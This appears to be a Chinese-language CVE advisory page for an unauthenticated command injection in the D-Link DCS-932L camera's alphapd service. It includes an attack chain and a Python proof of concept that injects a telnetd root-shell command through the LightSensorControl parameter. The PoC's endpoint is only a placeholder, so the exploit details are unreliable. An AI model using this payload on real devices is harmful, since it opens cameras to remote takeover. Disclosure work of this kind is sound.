CVE-2026-36983 CVSS 7.3 高危

CVE-2026-36983 D-Link DCS-932L 命令注入漏洞

披露日期: 2026-05-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36983

漏洞类型

命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DCS-932L

漏洞概述

D-Link DCS-932L 固件版本 v2.18.01 中的 /bin/alphapd 二进制文件存在命令注入漏洞。攻击者无需身份认证即可通过操纵 LightSensorControl 参数，在 sub_42EF14 函数中注入恶意命令。由于无需用户交互，该漏洞可被利用在受影响设备上远程执行任意系统命令，导致数据泄露、完整性受损或服务中断。

技术细节

该漏洞位于 D-Link DCS-932L 摄像头的 alphapd 守护进程（/bin/alphapd）中。具体而言，在处理配置请求的 sub_42EF14 函数中，程序直接获取用户提供的 'LightSensorControl' 参数，并将其传递给系统命令执行函数（如 system() 或 popen()），且未进行适当的输入清洗或边界检查。由于该服务通常监听在网络上，且根据 CVSS 3.1 向量 (PR:N) 显示无需认证，攻击者可以向目标端口发送特制的 HTTP 请求或数据包。通过在参数中注入 shell 元字符（如 `;`, `&`, `|`），攻击者可以追加并执行任意操作系统命令，从而获得设备的控制权。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络目标，识别出 D-Link DCS-932L 设备并确认其运行固件版本 v2.18.01。

STEP 2

2. 漏洞探测

向设备的 web 服务接口发送特制的 HTTP POST 请求，其中包含针对 LightSensorControl 参数的探测 payload。

STEP 3

3. 命令注入

设备端的 /bin/alphapd 进程接收到请求，在 sub_42EF14 函数中未过滤处理 LightSensorControl 参数，直接将其拼接进系统命令执行。

STEP 4

4. 权限获取

注入的恶意命令（如开启 telnet 服务）被执行，攻击者获得设备的 root shell 权限，完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    target_url = f"http://{target_ip}/some_endpoint" # Actual endpoint depends on reverse engineering
    # Payload to inject a command (e.g., telnetd or busybox nc)
    # The vulnerable parameter is LightSensorControl
    payload = "; telnetd -l /bin/sh -p 2323"
    
    data = {
        "LightSensorControl": payload
    }
    
    try:
        print(f"[*] Sending payload to {target_ip}...")
        response = requests.post(target_url, data=data, timeout=5)
        if response.status_code == 200:
            print("[+] Payload sent successfully.")
            print("[+] Try connecting to port 2323.")
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with target IP
    exploit(target)

影响范围

D-Link DCS-932L v2.18.01

防御指南

临时缓解措施

如果无法立即升级，建议将设备置于内网隔离区，禁止公网直接访问其管理界面；或通过 ACL 规则仅允许受信任的维护主机 IP 连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表